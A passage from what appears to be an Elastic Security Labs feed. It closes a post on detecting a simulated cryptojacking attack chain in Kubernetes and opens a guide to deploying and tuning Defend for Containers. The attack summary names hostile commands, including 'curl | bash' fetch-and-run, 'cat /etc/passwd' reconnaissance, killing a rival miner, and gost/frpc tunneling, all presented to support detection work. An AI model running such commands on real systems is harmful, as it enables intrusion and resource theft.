<p>For anyone already familiar with Kubernetes audit logs or interested in learning more about them, we have several prebuilt detection rules available that leverage the Kubernetes audit log framework in our <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/kubernetes">GitHub detection-rules repository</a>.</p>
<h3>Stage 10 – Web Server Exploitation via React2Shell</h3>
<p>In addition to exploiting compromised containers and Kubernetes control paths, TeamPCP also leverages direct web server exploitation to gain shell access on exposed services. One of the techniques referenced in related campaigns is React2Shell, where vulnerable web applications are abused to achieve remote command execution and drop into an interactive shell.</p>
<p>The attacker’s objective here is straightforward: expand access beyond Kubernetes workloads and increase the number of entry points into the environment. Web-facing services are often less strictly isolated than containers and can provide a fast path to host-level compromise if left unpatched.</p>
<p>From a detection standpoint, this activity is already well covered. Elastic provides an umbrella web server exploitation detection that flags suspicious command execution patterns originating from web server processes. In addition, multiple host-based Linux detections identify post-exploitation behavior following successful web shell access, such as unexpected shell execution, command interpreters launched by web services, and follow-on tooling execution.</p>
<p>Detecting this stage is important because it represents an alternative ingress path that bypasses container-specific defenses entirely. When correlated with earlier D4C detections, React2Shell-style exploitation helps confirm that the attacker is actively pursuing multiple avenues of access, increasing both blast radius and persistence potential.</p>
<p>The detection rule that triggered in this stage is available here:</p>
<ul>
<li><a href="https://github.com/elastic/detection-rules/blob/ce3916f99fdf7e886d2889d7a815f59a248b7aff/rules/integrations/cloud_defend/persistence_suspicious_webserver_child_process_execution.toml">Web Server Exploitation Detected via Defend for Containers</a></li>
</ul>
<p>Resulting in the following detection alerts upon web server exploitation:</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image1.png" alt="Figure 12: Detection rules triggering for stage 10: Web Server Exploitation via React2Shell" title="Figure 12: Detection rules triggering for stage 10: Web Server Exploitation via React2Shell" /></p>
<p>What makes this scenario effective as a detection exercise is that every major objective of the attacker (execution, persistence, propagation, and monetization) manifests as runtime behavior inside containers. D4C's ability to observe that behavior in context allows detection engineers to follow the attack as it unfolds, rather than discovering it only after the damage is done.</p>
<h2>Tying It All Together with Attack Discovery</h2>
<p>Running individual detection rules across container runtime and Kubernetes audit telemetry produces dozens of alerts, each highlighting a single suspicious action in isolation. A defender reviewing these one by one would see a privileged pod here, a <code>curl | bash</code> there, and a burst of API enumeration somewhere else. The challenge is not generating alerts; it is recognizing that these 130+ signals are all part of the same operation.</p>
<p>This is where <a href="https://www.elastic.co/kr/docs/solutions/security/ai/attack-discovery">Attack Discovery</a> comes in. Attack Discovery is Elastic's generative AI capability that ingests a set of alerts and automatically correlates them into coherent attack narratives. Rather than forcing an analyst to manually pivot between individual alerts, it identifies which signals belong together and maps them to the MITRE ATT&amp;CK framework, producing a single, readable summary of what happened.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/image6.png" alt="Figure 13: Attack Discovery analysis of the whole TeamPCP attack chain" title="Figure 13: Attack Discovery analysis of the whole TeamPCP attack chain" /></p>
<p>When pointed at the alerts generated by this simulation, Attack Discovery correctly reconstructed the full TeamPCP kill chain as a “Container Cryptojacking Attack Chain”. The summary identified:</p>
<ul>
<li><strong>Initial Access:</strong> Web server exploitation on the victim node, where <code>busybox</code> spawned from <code>python3.11</code> and executed reconnaissance commands (<code>id</code>, <code>whoami</code>, <code>uname -a</code>, <code>cat /etc/passwd</code>)</li>
<li><strong>Privilege Escalation:</strong> The <code>system:serviceaccount:kube-system:daemon-set-controller</code> service account creating highly privileged pods with <code>HostPID</code>, <code>HostNetwork</code>, privileged mode, and sensitive <code>hostPath</code> volume mounts</li>
<li><strong>Defense Evasion:</strong> Competitor cryptominer cleanup via <code>pkill -9 xmrig</code> and <code>pkill -9 XMRig</code>, alongside base64-encoded Python payloads</li>
<li><strong>Tool Staging:</strong> Runtime package installation (<code>apk</code>, <code>curl</code>, <code>bash</code>, <code>python3</code>) and malicious script download via <code>curl</code> from the simulated C2 server</li>
<li><strong>C2 Infrastructure:</strong> Deployment of tunneling tools <code>gost</code> and <code>frpc</code> under <code>/opt/teampcp</code>, with a SOCKS5 proxy listening on port 1081</li>
<li><strong>Impact:</strong> A decoded and staged <code>/tmp/miner</code> binary: the cryptojacking objective</li>
</ul>
<p>The attack chain visualization maps the correlated alerts across the full MITRE ATT&amp;CK kill chain, from Initial Access through to Impact, with confirmed activity in Execution, Privilege Escalation, Defense Evasion, Discovery, and Command &amp; Control.</p>
<p>This is the payoff of combining D4C runtime telemetry with Kubernetes audit logs. Neither data source alone would produce this picture: container runtime sees the <code>curl | bash</code>, the <code>gost</code> process, and the miner binary, while the audit logs capture the DaemonSet creation, the RBAC abuse, and the API enumeration. Attack Discovery fuses both into a single narrative that a SOC analyst can act on immediately, without manually stitching together alerts across different indices and timeframes.</p>
<h2>Conclusion</h2>
<p>Across this attack chain, we observed a consistent pattern. Interactive execution within containers led to environment discovery, lateral movement via Kubernetes APIs, attempts at persistence in locations inconsistent with container design, installation of runtime tooling, tunneling activity, reconstruction of encoded payloads, and, finally, resource monetization. Each objective produced distinct runtime signals.</p>
<p>Defend for Containers’ value lies in surfacing these signals with the container and orchestration context attached. Process lineage, capability metadata, interactive execution flags, file modification telemetry, and container identity together allow detections to move beyond simple command matching and instead reason about intent and impact.</p>
<p>This scenario also highlights an important architectural boundary. While D4C provides deep runtime visibility inside containers, certain escalation steps, such as privileged workload creation or control-plane manipulation, require Kubernetes audit log telemetry for full visibility. Effective cloud-native detection, therefore, depends on combining runtime and control-plane data sources.</p>
<p>In the next phase of this series, we will extend this model beyond the container boundary and explore Kubernetes control-plane detection engineering, correlating audit logs with D4C runtime events to detect multi-stage attacks that span workloads, nodes, and the cluster itself.</p>]]></content:encoded>
            <category>security-labs</category>
            <enclosure url="https://www.elastic.co/kr/security-labs/assets/images/teampcp-container-attack-scenario/teampcp-container-attack-scenario.png" length="0" type="image/png"/>
        </item>
        <item>
            <title><![CDATA[Linux & Cloud Detection Engineering - Getting Started with Defend for Containers (D4C)]]></title>
            <link>https://www.elastic.co/kr/security-labs/getting-started-with-defend-for-containers</link>
            <guid>getting-started-with-defend-for-containers</guid>
            <pubDate>Thu, 19 Mar 2026 00:00:00 GMT</pubDate>
            <description><![CDATA[This technical resource provides a comprehensive walkthrough of Elastic’s Defend for Containers (D4C) integration, covering Kubernetes-based deployment, the analysis of BPF-enriched runtime telemetry, and the practical application of policy-driven security controls to monitor and alert on activities within containerized Linux environments.]]></description>
            <content:encoded><![CDATA[<h2>Introduction</h2>
<p>Linux systems remain a critical foundation for modern infrastructure, particularly in cloud-native environments where containers and orchestration platforms are the norm. As workloads move from long-lived hosts to ephemeral containers, attacker tradecraft shifts as well. Activity that once left persistent artifacts on disk is increasingly confined to short-lived, runtime behavior that can be difficult to capture using traditional log sources.</p>
<p>Detection engineering in these environments, therefore, depends heavily on runtime visibility. Understanding how processes execute inside containers, how files are accessed, and how workloads interact with the host becomes more important than relying on static indicators or post-incident artifacts.</p>
<p>Elastic provides several Linux-focused telemetry sources to support this type of detection work. In <a href="https://www.elastic.co/kr/security-labs/linux-detection-engineering-with-auditd">earlier posts in this series</a>, we focused on host-level visibility using Auditd and Auditd Manager, showing how low-level system events can be translated into high-fidelity detections. In this post, the focus shifts to Elastic’s Defend for Containers: a runtime security integration built specifically for containerized Linux workloads.</p>
<p>The goal of this article is not to document every Defend for Containers feature, but to provide a practical starting point for detection engineers: what data the integration produces and how to reason about that data. In the next part, we will look into how it can be applied to realistic container attack scenarios.</p>
<h2>Streamlined visibility with Defend for Containers</h2>
<p>We are excited to announce the arrival of Defend for Containers in the 9.3.0 release. This integration brings a streamlined approach to container security, offering a strong foundation for visibility in cloud-native infrastructures. Users can leverage a suite of detection rules tailored to defend against modern Kubernetes threats and container-specific vulnerabilities. The arrival of Defend for Containers is accompanied by <a href="https://github.com/elastic/detection-rules/tree/main/rules/integrations/cloud_defend">a container-specific detection ruleset</a>, designed around realistic container and Kubernetes threat models.</p>
<p>At the time of writing, the Defend for Containers ruleset provides baseline coverage for common container attack techniques, including reconnaissance activity, credential access attempts, kubelet attacks, service account token abuse, interactive process execution, file creation and modification, interpreter abuse, encoded payload execution, tooling installation, tunneling behavior, and multiple privilege escalation vectors. Importantly, all existing container- and Kubernetes-specific detection rules <a href="https://github.com/elastic/detection-rules/pull/5685">have been made compatible with Defend for Containers</a>, allowing previously host-centric logic to operate directly on container runtime telemetry.</p>
<p>This makes Defend for Containers a practical and immediately usable data source for Linux detection engineers focused on behavior-driven runtime detection. The remainder of this post focuses on how that telemetry looks in practice and how it can be applied to real-world container attack scenarios.</p>
<h2>Introduction to Defend for Containers</h2>
<p><a href="https://www.elastic.co/kr/docs/reference/integrations/cloud_defend">Defend for Containers</a> is a runtime security integration that provides visibility into Linux containers as they execute. Instead of relying on static image scanning or post-execution logs, it focuses on observing container behavior in real time.</p>
<p>At a high level, Defend for Containers captures security-relevant runtime events from running containers, such as process execution and file access. These events are enriched with container and orchestration context and shipped into Elasticsearch, where they can be analyzed and used as input for detection rules.</p>
<p>From a detection engineering perspective, Defend for Containers sits at the intersection of traditional Linux behavior and the container context. Processes, syscalls, and file activity remain core signals, but they are now scoped to containers, namespaces, and workloads that may only exist briefly.</p>
<p>Defend for Containers is deployed as part of the Elastic Agent and integrates directly with Elastic Security. Once enabled, it provides a dedicated stream of container runtime events that can be queried using KQL or ES|QL, or consumed directly by detection analytics. This allows detection engineers to apply familiar analysis techniques while accounting for the operational realities of cloud-native workloads.</p>
<p>In the sections that follow, we will examine Defend for Containers events in more detail and walk through several container attack scenarios to illustrate how this data can be used in practice.</p>
<h3>Defend for Containers setup</h3>
<p>Before you can take advantage of Defend for Containers' runtime visibility and analytics, you need to deploy the integration and configure a policy that defines which events to observe and what actions to take when matching activity is encountered. More information about the integration and its setup can be found <a href="https://www.elastic.co/kr/docs/reference/integrations/cloud_defend">here</a>. At a high level, this setup consists of:</p>
<ol>
<li>Deploying the Defend for Containers integration via Elastic Agent in your Kubernetes environment.</li>
<li>Configuring or customizing the Defend for Containers policy, which consists of selectors that define which operations to match and responses that define what actions to take.</li>
<li>Validating and refining the policy based on observed workload behavior.</li>
</ol>
<h3>Deployment methods</h3>
<p>Defend for Containers is delivered as an Elastic Agent integration and relies on Elastic Agent to collect and forward container runtime telemetry into your Elastic Stack. For Kubernetes workloads, you install the integration via the Elastic Security UI and then enroll agents on your cluster nodes.</p>
<p>The basic deployment flow is:</p>
<p>In the Elastic Security UI, navigate to <a href="https://www.elastic.co/kr/docs/reference/fleet">Fleet</a> and create a new Agent Policy (or add the integration to an existing one). Once the Agent Policy is created, we can add the “Defend for Containers” integration to the policy.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image1.png" alt="Figure 1: Add the integration to the agent policy view" title="Figure 1: Add the integration to the agent policy view" /></p>
<p>Give the integration a name and optionally adjust the default selectors and responses (we will look into the available options further down in this publication). Once “Add integration” is selected, a new Agent Policy with the correct integration should be available.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image5.png" alt="Figure 2: Agent policy integrations overview" title="Figure 2: Agent policy integrations overview" /></p>
<p>For this demonstration, we will leverage the Kubernetes deployment method. To deploy this policy to a workload, we can navigate to Actions → Add agent → Kubernetes. Here, we see instructions for copying or downloading the Kubernetes manifest.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image19.png" alt="Figure 3: Defend for Containers Kubernetes manifest overview" title="Figure 3: Defend for Containers Kubernetes manifest overview" /></p>
<p>An important note to be aware of is: “<em>Note that the following manifest contains resource limits that may not be appropriate for a production environment. Review our guide on <a href="https://www.elastic.co/kr/docs/reference/fleet/scaling-on-kubernetes#_specifying_resources_and_limits_in_agent_manifests">Scaling Elastic Agent on Kubernetes</a> before deploying this manifest.</em>”</p>
<p>You will need to include the following <code>capabilities</code> under <code>securityContext</code> in your Kubernetes YAML for the service to work:</p>
<pre><code class="language-yaml">securityContext:
    runAsUser: 0
    capabilities:
      add:
        - BPF ## Enables both BPF &amp; eBPF
        - PERFMON
        - SYS_RESOURCE
</code></pre>
<p>After copying or downloading the provided <code>elastic-agent-managed-kubernetes.yml</code> manifest, you can edit it as needed and apply it with:</p>
<pre><code class="language-bash">kubectl apply -f elastic-agent-managed-kubernetes.yml
</code></pre>
<p>As also mentioned in the manifest, review the guide “<a href="https://www.elastic.co/kr/docs/reference/fleet/running-on-kubernetes-managed-by-fleet">Run Elastic Agent on Kubernetes managed by Fleet</a>” for more deployment information.</p>
<p>Wait for the Elastic Agent pods to schedule and for data to begin flowing into Elasticsearch.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image16.png" alt="Figure 4: Defend for Containers integration input overview" title="Figure 4: Defend for Containers integration input overview" /></p>
<p>Once deployed, Elastic Agent will establish a connection to Fleet, enroll under the selected policy, and begin emitting Defend for Containers telemetry that Elastic Security can consume.</p>
<p>In the next section, we will take a look at the integration configuration options and explore which features are available to use.</p>
<h3>Defend for Containers policies</h3>
<p>At the heart of Defend for Containers' configuration is the policy. Policies determine what activity to observe and how to respond when matching events occur. Policies are composed of two fundamental building blocks:</p>
<ul>
<li><strong>Selectors:</strong> define which events are of interest by specifying operations and conditions;</li>
<li><strong>Responses:</strong> define what actions to take when a selector’s conditions are met.</li>
</ul>
<p>Defend for Containers policies can be edited before deployment or modified post-deployment via the Elastic Security UI’s policy editor.</p>
<h4>Policy structure</h4>
<p>Each policy must contain at least one selector and at least one response. A typical selector specifies one or more operations (such as process events or file activities) and uses conditions (like container image name, namespace, or pod label) to narrow the scope. Responses reference selectors and indicate what action to take when events match.</p>
<p>The default Defend for Containers policy includes two selector-response pairs: “Threat Detection” and “Drift Detection &amp; Prevention”.</p>
<p><strong>Threat detection:</strong> A <code>selector</code> named <code>allProcesses</code> matches all <code>fork</code> and <code>exec</code> events from containers.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image13.png" alt="Figure 5: Defend for Containers allProcesses selector" title="Figure 5: Defend for Containers allProcesses selector" /></p>
<p>And the associated <code>response</code> has the action set to <code>Log</code>, ensuring that events are ingested and can be analyzed.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image11.png" alt="Figure 6: Defend for Containers allProcesses log response" title="Figure 6: Defend for Containers allProcesses `log` response" /></p>
<p><strong>Drift detection &amp; prevention:</strong> A selector named <code>executableChanges</code> matches <code>createExecutable</code> and <code>modifyExecutable</code> operations.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image7.png" alt="Figure 7: Defend for Containers executableChanges selector" title="Figure 7: Defend for Containers executableChanges selector" /></p>
<p>And the response is configured to create alerts (and can be modified to block those operations).</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image18.png" alt="Figure 8: Defend for Containers executableChanges alert response" title="Figure 8: Defend for Containers executableChanges `alert` response" /></p>
<p>These can be modified via the UI, but under the hood, they are simple YAML configuration files that can be edited directly and used in any CI/CD flow:</p>
<pre><code class="language-yaml">process:
  selectors:
    - name: allProcesses
      operation:
        - fork
        - exec
  responses:
    - match:
        - allProcesses
      actions:
        - log
file:
  selectors:
    - name: executableChanges
      operation:
        - createExecutable
        - modifyExecutable
  responses:
    - match:
        - executableChanges
      actions:
        - alert
</code></pre>
<p>Next, we will take a look at some example selectors and responses and discuss the options you have for setting up the integration to your liking.</p>
<p><strong>Example selector snippet</strong></p>
<p>Selectors allow fine-grained matching using conditions on fields such as:</p>
<ul>
<li><code>containerImageFullName</code>: full image names like <code>docker.io/nginx</code>;</li>
<li><code>containerImageName</code>: partial image names;</li>
<li><code>containerImageTag</code>: specific tags like <code>latest</code>;</li>
<li><code>kubernetesClusterId</code>: Kubernetes cluster IDs;</li>
<li><code>kubernetesClusterName</code>: Kubernetes cluster names;</li>
<li><code>kubernetesNamespace</code>: namespaces where the workload runs;</li>
<li><code>kubernetesPodName</code>: pod names, with support for trailing wildcards;</li>
<li><code>kubernetesPodLabel</code>: label key/value pairs, with wildcard support.</li>
</ul>
<pre><code class="language-yaml">file:
  selectors:
    - name: nodeExports
      operation:
        - createExecutable
        - modifyExecutable
      containerImageName:
        - &quot;nginx&quot;
      kubernetesNamespace:
        - &quot;prod-*&quot;
</code></pre>
<p>In this example, the selector named <code>nodeExports</code> matches file events that create or modify executables within containers whose image names contain “nginx” and whose Kubernetes namespace begins with <code>prod-</code>.</p>
<p><strong>Example response snippet</strong></p>
<p>Responses determine what happens when selector conditions are met. Common actions include:</p>
<ul>
<li><code>log</code>: send the event as telemetry for analysis;</li>
<li><code>alert</code>: create an alert in Elastic Security;</li>
<li><code>block</code>: prevent the operation (for supported types).</li>
</ul>
<pre><code class="language-yaml">responses:
  - match:
      - nodeExports
    actions:
      - alert
      - block
</code></pre>
<p>Here, the response references the previously defined <code>nodeExports</code> selector and will both generate an alert and block the operation.</p>
<h4>Wildcards and matching</h4>
<p>Selectors in Defend for Containers support trailing wildcards in string-based conditions (such as pod names or image tags). This allows broad matching without enumerating every possible value. For example, a pod selector of <code>backend-*</code> will match all pods whose names begin with <code>backend-</code>, while a label condition such as <code>role:api*</code> matches label values that start with <code>api</code>.</p>
<p>This wildcarding is essential in dynamic environments where workloads scale and shift rapidly.</p>
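<p>Putting those two wildcard styles into a Defend for Containers selector, a sketch might look like the following (the selector name is illustrative):</p>
<pre><code class="language-yaml"># Illustrative selector: match exec events in any pod whose name
# begins with &quot;backend-&quot; and whose role label starts with &quot;api&quot;.
process:
  selectors:
    - name: backendApiPods
      operation:
        - exec
      kubernetesPodName:
        - &quot;backend-*&quot;
      kubernetesPodLabel:
        - &quot;role:api*&quot;
</code></pre>
<p>As replicas scale up and down, new pods such as <code>backend-7f9c4</code> continue to match without any policy changes.</p>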
<p>In addition to simple string matching, Defend for Containers selectors also support <strong>path-based wildcard semantics</strong> when matching file paths. Consider the following selector example:</p>
<pre><code class="language-yaml">- name: pathExamples
  targetFilePath:
    - /usr/bin/echo
    - /usr/sbin/*
    - /usr/local/**
</code></pre>
<p>In this example:</p>
<ul>
<li><code>/usr/bin/echo</code> matches only the <code>echo</code> binary at that exact path.</li>
<li><code>/usr/sbin/*</code> matches everything that is a direct child of <code>/usr/sbin</code>.</li>
<li><code>/usr/local/**</code> matches everything recursively under <code>/usr/local</code>, including paths such as <code>/usr/local/bin/something</code>.</li>
</ul>
<p>These distinctions make it possible to precisely scope file-based selectors, balancing coverage and noise. In practice, they allow detection engineers to target specific binaries, entire directories, or deep directory trees, depending on the use case, without resorting to overly permissive rules.</p>
<h4>Tying it all together</h4>
<p>Up to this point, we have looked at Defend for Containers selectors, wildcard semantics, event types, and how they surface attacker behavior at runtime. The final step is to understand how these pieces come together within a policy to express real detection logic.</p>
<p>Consider the following policy fragment:</p>
<pre><code class="language-yaml">file:
  selectors:
    - name: binDirExeMods
      operation:
        - createExecutable
        - modifyExecutable
      targetFilePath:
        - /usr/bin/**
    - name: etcFileChanges
      operation:
        - createFile
        - modifyFile
        - deleteFile
      targetFilePath:
        - /etc/**
    - name: nginx
      containerImageName:
        - nginx

  responses:
    - match:
        - binDirExeMods
        - etcFileChanges
      exclude:
        - nginx
      actions:
        - alert
        - block
</code></pre>
<p>This policy defines three selectors. Two selectors (<code>binDirExeMods</code> and <code>etcFileChanges</code>) describe file system activity of interest, while the third selector (<code>nginx</code>) describes a container context to exclude.</p>
<p>The response section ties these selectors together. The selectors listed under <code>match</code> are logically <code>OR</code>’d, meaning that <em>either</em> condition is sufficient to trigger the response. The selector listed under <code>exclude</code> acts as a logical <code>NOT</code>, removing matching events when the container image is <code>nginx</code>.</p>
<p>Read in plain language, the policy expresses the following logic:</p>
<p><em>If an executable is created or modified anywhere under <code>/usr/bin</code>, <strong>or</strong> a file is created, modified, or deleted under <code>/etc</code>, <strong>and</strong> the activity does not originate from an <code>nginx</code> container, then generate an alert and block the action.</em></p>
<p>In Boolean form, this can be expressed as:</p>
<pre><code class="language-text">IF (binDirExeMods OR etcFileChanges) AND NOT nginx
→ alert + block
</code></pre>
<p>This is where Defend for Containers policies become powerful. Rather than writing complex detection logic in a query language, selectors let you decompose behavior into small, reusable building blocks and then combine them declaratively. By mixing path-based selectors, operation types, container context, and exclusions, you can express nuanced detection logic that remains readable and maintainable.</p>
<p>In practice, this model allows detection engineers to translate threat hypotheses directly into policy logic: <em>what</em> behavior matters, <em>where</em> it occurs, <em>in which workloads</em>, and <em>what should happen</em> when it does.</p>
<h4>Policy validation and refinement</h4>
<p>Once a policy is deployed, it is critical to validate it against real workload behavior before enabling aggressive responses such as blocking. Policies that are too restrictive can disrupt normal container operations; policies that are too permissive may let unwanted activity go unnoticed.</p>
<p>A recommended workflow is:</p>
<ol>
<li>Deploy the default policy in monitoring mode (e.g., with selectors logging events).</li>
<li>Observe the events that appear in Elasticsearch to understand normal workload patterns.</li>
<li>Incrementally tighten selectors and responses, moving from <em>log only</em> → <em>alert</em> → <em>block</em>, testing at each stage.</li>
<li>Use a staging or test cluster to validate blocking behaviors before applying them in production.</li>
</ol>
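<p>As a sketch of step 3, a response can begin with a log-only action and be tightened in later policy revisions (the <code>etcFileChanges</code> selector reuses the earlier example, and the <code>log</code> action is an assumption here; verify the available actions against the current integration documentation):</p>
<pre><code class="language-yaml">file:
  responses:
    - match:
        - etcFileChanges   # stage 1: observe normal workload behavior
      actions:
        - log
    # later revisions: actions: [alert], then [alert, block]
</code></pre>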
<h3>Defend for Containers Beta limitations</h3>
<p>As of writing, Defend for Containers is available as a Beta integration, and its current capabilities and platform support reflect that status.</p>
<p>Defend for Containers formally supports Amazon EKS and Google GKE. Azure AKS deployments are possible but not officially supported; in particular, they currently lack file event telemetry, which limits detection coverage for file-based attack techniques in those environments.</p>
<p>The current Beta also does not capture network events. As a result, detections related to outbound connections, lateral network movement, or data exfiltration must rely on complementary data sources, such as the <a href="https://www.elastic.co/kr/docs/reference/integrations/network_traffic">Network Packet Capture integration</a> or <a href="https://www.elastic.co/kr/beats/packetbeat">Packetbeat</a>, rather than on Defend for Containers telemetry alone.</p>
<p>For file activity, Defend for Containers intentionally logs file open events only when a file is opened with write intent. This design choice reduces noise and focuses on behavior that modifies system state. However, it also means that read-only access to sensitive files, such as secret discovery, configuration scraping, or failed access attempts, is not currently observable.</p>
<p>This limitation impacts detection use cases such as:</p>
<ul>
<li>Searching and reading Kubernetes service account tokens,</li>
<li>Scanning for <code>.env</code> files or credential material.</li>
</ul>
<p>These are areas where future Defend for Containers iterations may provide more granular telemetry to support advanced detection engineering use cases.</p>
<h3>Enabling the Defend for Containers pre-built detection rules</h3>
<p>Defend for Containers ships with a set of pre-built detection rules that provide baseline coverage for common container attack techniques. Once the integration is enabled, these rules can be activated directly from Elastic Security without additional configuration.</p>
<p>Enabling the pre-built rules is recommended as a starting point, as they are designed to align with Defend for Containers' runtime telemetry and cover execution, file modification, persistence, and post-compromise behavior inside containers. From there, the rules can be extended or refined to match environment-specific workloads and threat models.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image17.png" alt="Figure 9: Defend for Containers pre-built detection rule installation based on tag" title="Figure 9: Defend for Containers pre-built detection rule installation based on tag" /></p>
<p>By filtering for “Data Source: Elastic Defend for Containers”, you can find all rules associated with this integration.</p>
<p><strong>Note:</strong> if no rules appear, make sure your stack is running version 9.3.0 or later, as these rules are deployed only on 9.3.0+.</p>
<p>With all important Beta limitations mapped, the integration deployed, the pre-built detection rules installed and enabled, and a working policy in place, the next step is to explore the event semantics Defend for Containers produces, including fields commonly used in detection logic, performance considerations, and how these events differ from Elastic Defend events.</p>
<h2>Analyzing Defend for Containers events</h2>
<p>Now that Defend for Containers is deployed and policies are in place, the next step is understanding the events it generates. Similar to working with Elastic Defend or Auditd Manager, Defend for Containers telemetry becomes far more valuable once you develop a mental model of how events are structured and which fields are most relevant for detection engineering.</p>
<p>Defend for Containers produces multiple event types, most notably process events and file events, each enriched with container, host, and orchestration context. While the underlying signals remain rooted in Linux behavior, the additional Kubernetes and container metadata enable you to reason about activity in ways not possible with host-only telemetry.</p>
<p>The following sections walk through the most important field groups and event types, using real Defend for Containers events as reference points.</p>
<h3>Common fields</h3>
<p>Before diving into specific event categories, it is useful to understand the fields that consistently appear across Defend for Containers telemetry. These fields provide the contextual glue that ties individual runtime actions back to policies, selectors, and the underlying execution points inside the kernel.</p>
<p>While process and file events differ in their details, the fields described below are present across Defend for Containers data streams and are often the first place to look when validating detections or troubleshooting policy behavior.</p>
<h4>Defend for Containers-specific context</h4>
<p>Defend for Containers adds several fields specific to how events are collected and policies are applied.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image10.png" alt="Figure 10: Defend for Containers’ important cloud_defend.* fields overview" title="Figure 10: Defend for Containers’ important `cloud_defend.*` fields overview" /></p>
<p>The <code>cloud_defend.hook_point</code> field indicates where in the kernel the event was captured. In the example shown, values such as <code>tracepoint__sched_process_fork</code> and <code>tracepoint__sched_process_exec</code> reveal that the event was generated from kernel tracepoints associated with process creation and execution.</p>
<p>The <code>cloud_defend.matched_selectors</code> field shows which selectors in the active policy matched the event. In the example, the value <code>allProcesses</code> indicates that this event matched a broad selector that captures all process activity. When tuning policies or investigating alerts, this field is essential for understanding <em>why</em> an event was captured.</p>
<p>The <code>cloud_defend.package_policy_id</code> and <code>cloud_defend.package_policy_revision</code> fields tie the event back to a specific Elastic Agent policy and its revision. This makes it possible to correlate events with configuration changes over time and to verify which version of a policy was active when the event occurred.</p>
<h4>Event metadata</h4>
<p>Defend for Containers events follow the <a href="https://www.elastic.co/kr/docs/reference/ecs">Elastic Common Schema</a> conventions and include standard event metadata that describes the activity's type and lifecycle.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image2.png" alt="Figure 11: Defend for Containers’ important event.* fields overview" title="Figure 11: Defend for Containers’ important `event.*` fields overview" /></p>
<p>The <code>event.category</code> field identifies the high-level type of activity, such as <code>process</code> or <code>file</code>, and is typically the first field used when filtering Defend for Containers data. The <code>event.action</code> field describes what occurred, for example, <code>fork</code> or <code>exec</code> for process activity, or <code>open</code>, <code>creation</code>, <code>modification</code>, and <code>deletion</code> for file events.</p>
<p>The <code>event.type</code> field adds lifecycle context, such as <code>start</code> for process execution, and is often used together with <code>event.action</code> to distinguish different phases of activity. The <code>event.dataset</code> field indicates the originating Defend for Containers data stream, such as <code>cloud_defend.process</code>, which is useful when building dataset-scoped queries or detections.</p>
<p>Additional metadata fields like <code>event.id</code>, <code>event.ingested</code>, and <code>event.kind</code> are primarily used for correlation, ordering, and troubleshooting rather than detection logic.</p>
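<p>Put together, a minimal KQL filter scoping a search to Defend for Containers process executions might look like the following (a sketch; adjust the values to your data):</p>
<pre><code class="language-text">event.dataset : "cloud_defend.process" and event.category : "process"
  and event.action : "exec" and event.type : "start"
</code></pre>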
<h4>Host information</h4>
<p>Defend for Containers events include full host context, similar to Elastic Defend and Auditd Manager. This makes it possible to correlate container runtime activity back to the underlying Kubernetes node.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image9.png" alt="Figure 12: Defend for Containers’ important host.* fields overview" title="Figure 12: Defend for Containers’ important `host.*` fields overview" /></p>
<p>The <code>host.name</code> field identifies the node on which the container is running, while <code>host.os.*</code> provides operating system details such as distribution and kernel version. The <code>host.architecture</code> field indicates the CPU architecture, which can be relevant when analyzing binary execution or kernel-specific behavior.</p>
<p>One particularly useful field is <code>host.pid_ns_ino</code>, which identifies the PID namespace. This field allows container activity to be correlated with host-level process and kernel telemetry, and is especially valuable when investigating container escape attempts or node-level impact.</p>
<p>This host context is critical when analyzing cloud-native attacks, as multiple containers often share the same host and kernel, and a container's runtime behavior can have implications beyond its boundaries.</p>
<h4>Container and orchestrator context</h4>
<p>Defend for Containers' primary strength lies in its container awareness. Every runtime event is enriched with container and orchestration metadata, allowing activity to be analyzed in the context of <em>what</em> is running, <em>where it is running</em>, and <em>with which privileges</em>.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image8.png" alt="Figure 13: Defend for Containers’ important container.* fields overview" title="Figure 13: Defend for Containers’ important `container.*` fields overview" /></p>
<p>At the container level, fields such as <code>container.id</code> and <code>container.name</code> uniquely identify the running container, while <code>container.image.name</code>, <code>container.image.tag</code>, and the image hash provide visibility into the workload’s origin and version. This is especially useful for distinguishing between expected utility images and unexpected or ad hoc workloads.</p>
<p>A key field for risk assessment is <code>container.security_context.privileged</code>. This field explicitly indicates whether a container is running in privileged mode. When privileged execution is combined with other signals such as interactive shells or broad Linux capabilities, the risk profile of any detected activity increases significantly.</p>
<p><img src="https://www.elastic.co/kr/security-labs/assets/images/getting-started-with-defend-for-containers/image3.png" alt="Figure 14: Defend for Containers’ important orchestrator.* fields overview" title="Figure 14: Defend for Containers’ important `orchestrator.*` fields overview" /></p>
<p>Defend for Containers also enriches events with orchestration context. Fields such as <code>orchestrator.cluster.name</code>, <code>orchestrator.namespace</code>, and <code>orchestrator.resource.name</code> (typically the Pod name) tie runtime behavior back to Kubernetes workloads. Labels exposed via <code>orchestrator.resource.label</code> further allow detections to incorporate workload intent and ownership.</p>
<p>For detection engineering, this context enables precise scoping of detections to:</p>
<ul>
<li>specific namespaces (for example, <code>kube-system</code>),</li>
<li>privileged or high-risk containers,</li>
<li>workloads with sensitive labels,</li>
<li>or known utility images such as <code>netshoot</code>, <code>kubectl</code>, or <code>curl</code>.</li>
</ul>
